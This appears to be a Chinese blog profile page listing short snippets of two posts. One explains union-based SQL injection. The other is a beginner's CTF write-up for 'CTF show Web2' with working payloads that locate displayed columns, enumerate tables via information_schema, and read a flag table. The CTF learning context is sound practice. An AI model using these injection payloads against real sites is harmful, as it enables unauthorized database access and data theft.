- 博客(3)
- 收藏
- 关注
原创 博客摘录「sql联合查询注入」
例如 select group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='表名'sql联合查询的注入点都比较明显, 必须是页面上的显示位(页面中展示数据库中数据的位置),否则无法注入,如id,name等等。显示数据库错误信息或者页面回显不同可以判断是整形注入和字符型注入.整型注入没有变化,而字符型注入则回显不同。5、获取数据库中的表名。7、获取字段中的数据。
2023-10-05 20:59:17 303
原创 新手成长日记:CTF show Web2
a' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='web2'),3 # //脱表。a' union select 1,2,3# (admin' or 1=1 union select 1,2,3#) //显示回显字段位置。a' union select 1 ,(select flag from flag),3# //获取flag表数据。
2023-10-05 20:58:46 118
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人